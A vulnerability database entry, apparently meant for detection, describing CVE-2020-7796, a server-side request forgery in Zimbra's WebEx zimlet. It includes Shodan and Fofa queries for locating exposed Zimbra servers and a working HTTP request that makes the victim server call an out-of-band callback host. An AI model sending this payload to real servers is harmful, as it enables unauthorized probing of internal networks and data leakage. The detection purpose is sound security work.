🔙 목록으로 돌아가기

CVE-2020-7796: Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery

TitleZimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery
Authorgy741
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access or data leakage.
RemediationApply the latest patch or upgrade to Zimbra Collaboration Suite version 8.8.15 Patch 7 or higher to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.90602
CVE IDCVE-2020-7796
CWE IDCWE-918
Shodan Queryhttp.title:"zimbra collaboration suite"http.title:"zimbra web client sign in"
Fofa Querytitle="zimbra web client sign in"title="zimbra collaboration suite"
Tags cve cve2020 zimbra ssrf oast synacor vkev vuln

🔍 Vulnerability Description

Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled.

🌐 HTTP Request

GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://d5jp23hle0o1dq03t330o1yt5xiuxi9xr.oast.pro%23 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.16
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-7796.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-7796.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A